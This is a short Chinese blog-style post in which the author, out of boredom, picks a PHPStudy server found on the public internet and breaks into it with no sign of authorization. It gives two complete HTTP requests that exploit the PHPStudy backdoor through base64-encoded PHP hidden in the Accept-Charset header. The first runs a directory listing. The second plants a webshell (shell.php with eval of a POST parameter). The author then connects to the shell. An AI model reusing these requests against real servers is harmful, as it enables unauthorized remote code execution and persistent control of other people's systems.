今天有点烦躁,所以得找点事刺激一下
于是,公网上搜了一个PHPstudy的站
测试payload看看有没有漏洞,果然、存在漏洞
看一下目录
GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZWNobyBzeXN0ZW0oImRpciBEOlxwaHBTdHVkeVxXV1dcICIpOw== Connection: close
写入webshell
GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZnB1dHMoZm9wZW4oJ0Q6XHBocFN0dWR5XFdXV1xzaGVsbC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFtraWxsXSk/PicpOw== Connection: close
再次查看一下目录,可以看到成功了
连接,OK,收工。。。
评论